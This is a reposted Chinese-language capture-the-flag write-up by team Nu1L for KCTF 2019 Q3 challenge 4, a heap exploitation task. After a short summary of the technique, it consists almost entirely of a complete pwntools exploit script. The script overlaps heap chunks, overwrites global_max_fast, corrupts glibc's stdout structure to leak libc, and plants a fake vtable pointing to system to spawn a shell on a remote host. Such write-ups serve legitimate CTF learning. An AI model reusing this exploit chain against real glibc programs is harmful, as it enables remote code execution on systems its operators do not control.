KCTF 2019 Q3 第四题 Writeup by Nu1L
2019-09-26 13:41:31 Author: bbs.pediy.com(查看原文) 阅读量:220 收藏

[原创] KCTF 2019 Q3 第四题 Writeup by Nu1L

14小时前 32

[原创] KCTF 2019 Q3 第四题 Writeup by Nu1L

类似于之前ByteCTF的notefive
堆叠走起
然后修改global_max_fast
然后修改_IO_2_1stdout leak
最后修改_IO_2_1stderr->file_jumps

from pwn import *
import sys
context.aslr = False
context.arch = 'amd64'
libc = ELF("./libc-2.23.so")
#io = process("./note_five")
#io = remote('112.126.103.195',9999)
def ch(c):
    io.sendlineafter(">>",str(c))
def new(size):
    ch(1)
    io.sendlineafter("size : ",str(size))
def edit(idx,data):
    ch(3)
    io.sendlineafter("idx : ",str(idx))
    io.sendafter("text : ",data)
def delete(idx):
    ch(2)
    io.sendlineafter("idx : ",str(idx))
while True:
    try:
        io = remote('154.8.174.214',10001)
        #io = process("./pwn")
        new(0xf8)    #0
        io.recvuntil(" : 0x")
        hbase = int(io.recvline().strip(),16)-0x10
        new(0xf8)    #1
        new(0xf8)    #2
        new(0xf8)    #3
        new(0xf8)    #4
        delete(0)
        edit(2,'A'*0xe0+p64(0)+p64(0x211)+p64(0x300)+'\x00'+'\n')
        delete(3)
        new(0x2f0)    #0
        edit(0,'B'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+'\n')
        delete(1)
        edit(0,'B'*0xf0+p64(0)+p64(0x101)+p64(0)+p16(0x97e8)+'\n')
        new(0xf8)
        new(0xf8)
        edit(0,'\0'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+'\n')
        delete(2)
        edit(0,'\0'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+p16(0x85cf)+'\n')
        new(0xe8)
        new(0xe8)
        edit(5,'\0'*0x41+p32(0xfbad1880)+';sh;'+'\0'*0x18+'\x88'+'\n')
        lbase = u64(io.recv(8))-libc.sym['_IO_2_1_stdin_']
        success("LBASE -> %#x"%lbase)
        delete(2)
        edit(0,'X'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+p64(lbase+libc.sym['_IO_2_1_stdout_']+0x8f)+'\n')
        new(0xe8)
        new(0xe8)
        fill = '\0'*0x39+p64(hbase+0x410)
        fake_vtable = p64(0)*2+p64(lbase+libc.sym['system'])*19
        edit(4,fake_vtable+'\n')
        edit(6,fill+'\n')
        io.interactive()
        raw_input()

    except Exception,e:
        info(str(Exception)+str(e))
        io.close()

[培训]《安卓高级研修班》彻底搞定函数抽取型壳!现在报名得源码和安卓8.1脱壳机!10月20日深圳专场不见不散!


文章来源: https://bbs.pediy.com/thread-254710.htm
如有侵权请联系:admin#unsafe.sh